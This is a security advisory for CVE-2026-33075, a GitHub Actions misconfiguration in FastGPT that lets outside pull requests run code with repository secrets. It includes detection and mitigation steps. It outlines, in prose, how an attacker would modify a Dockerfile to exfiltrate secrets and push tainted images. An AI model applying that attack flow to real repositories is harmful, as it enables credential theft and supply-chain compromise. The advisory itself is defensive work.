CVE-2026-33075 Overview
CVE-2026-33075 is a critical arbitrary code execution vulnerability in FastGPT, an AI Agent building platform. In versions 4.14.8.3 and below, the fastgpt-preview-image.yml GitHub Actions workflow is vulnerable to arbitrary code execution and secret exfiltration by any external contributor. The workflow uses pull_request_target (which runs with access to repository secrets) but incorrectly checks out code from the pull request author's fork, then builds and pushes Docker images using attacker-controlled Dockerfiles. This vulnerability also enables a supply chain attack via the production container registry.
Critical Impact
External attackers can execute arbitrary code with access to repository secrets, exfiltrate sensitive credentials, and potentially inject malicious code into production Docker images, compromising the entire software supply chain.
Affected Products
- FastGPT versions 4.14.8.3 and below
- FastGPT GitHub Actions workflows using fastgpt-preview-image.yml
- Production container registries consuming FastGPT Docker images
Discovery Timeline
- 2026-03-20 - CVE-2026-33075 published to NVD
- 2026-03-23 - Last updated in NVD database
Technical Details for CVE-2026-33075
Vulnerability Analysis
This vulnerability represents a dangerous pattern in GitHub Actions security where the pull_request_target trigger is misused. Unlike the standard pull_request trigger which runs workflows in the context of the fork with limited permissions, pull_request_target executes in the context of the base repository with full access to repository secrets.
The critical flaw occurs when the workflow checks out code from the pull request head (the attacker's fork) rather than the base branch. This allows an external contributor to submit a malicious pull request containing a modified Dockerfile or workflow code that will be executed with elevated privileges.
The vulnerability falls under CWE-494 (Download of Code Without Integrity Check), as the workflow fetches and executes code from an untrusted source without proper validation. An attacker can leverage this to exfiltrate secrets such as API keys, deployment credentials, and container registry tokens.
Root Cause
The root cause is the insecure combination of pull_request_target trigger with a checkout action that retrieves code from the pull request branch instead of the base repository. The pull_request_target event was designed to allow maintainers to add labels or comments on pull requests from forks, but when combined with code checkout from the fork, it creates a privilege escalation vector.
The workflow configuration fails to implement proper security boundaries between untrusted contributor code and privileged operations like Docker image building and pushing.
Attack Vector
The attack is network-accessible and requires only low privileges—an attacker simply needs the ability to open a pull request against the repository. The exploitation flow involves:
- An attacker forks the FastGPT repository
- The attacker modifies the Dockerfile or related build scripts to include malicious commands
- The attacker opens a pull request to the main repository
- The fastgpt-preview-image.yml workflow triggers with pull_request_target
- The workflow checks out the attacker's malicious code
- Malicious commands execute with access to repository secrets
- Secrets can be exfiltrated to attacker-controlled servers
- Compromised Docker images may be pushed to production registries
The vulnerability mechanism involves GitHub Actions workflow misconfigurations. For detailed technical analysis, see the FastGPT Security Advisory.
Detection Methods for CVE-2026-33075
Indicators of Compromise
- Unexpected pull requests from unknown contributors triggering the fastgpt-preview-image.yml workflow
- Unusual outbound network connections from GitHub Actions runners during workflow execution
- Modified Dockerfiles in pull requests containing suspicious commands or network calls
- Unauthorized Docker image tags appearing in the container registry
- Evidence of secret access or exfiltration in workflow logs
Detection Strategies
- Audit GitHub Actions workflow runs for the fastgpt-preview-image.yml file, focusing on pull requests from external contributors
- Monitor container registry for unauthorized image pushes or unexpected image modifications
- Review workflow execution logs for anomalous commands or network activity
- Implement GitHub repository rules to require approval before running workflows on pull requests from first-time contributors
Monitoring Recommendations
- Enable GitHub Advanced Security features to scan for vulnerable workflow patterns
- Configure alerts for any workflow runs triggered by pull_request_target events
- Implement container image signing and verification to detect supply chain compromises
- Set up monitoring for secret access patterns and unusual API calls using exposed credentials
How to Mitigate CVE-2026-33075
Immediate Actions Required
- Disable or modify the fastgpt-preview-image.yml workflow to prevent execution on untrusted pull requests
- Rotate all repository secrets that may have been exposed through workflow executions
- Audit recent pull requests for signs of exploitation attempts
- Review container registry for potentially compromised images and remove any unauthorized artifacts
- Enable branch protection rules requiring workflow approval for external contributors
Patch Information
A patch was not available at the time of publication. Organizations should monitor the FastGPT Security Advisory for updates regarding an official fix.
Workarounds
- Modify the workflow to use pull_request trigger instead of pull_request_target where possible
- If pull_request_target is required, ensure the workflow only checks out the base branch code, not the pull request head
- Implement workflow approval requirements for first-time contributors using GitHub's built-in settings
- Use GitHub Environments with required reviewers to gate sensitive operations like Docker image pushing
- Consider removing the vulnerable workflow entirely until a secure implementation is available
# Configuration example - Workflow approval settings
# Navigate to: Repository Settings > Actions > General
# 1. Under "Fork pull request workflows from outside collaborators"
# Select: "Require approval for all outside collaborators"
# 2. Enable required reviewers for workflows accessing secrets
# Repository Settings > Environments > [environment_name]
# Add required reviewers before deployment
# 3. Audit current workflow permissions
gh api repos/{owner}/{repo}/actions/permissions
# 4. Review recent workflow runs for suspicious activity
gh run list --workflow=fastgpt-preview-image.yml --limit=50
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

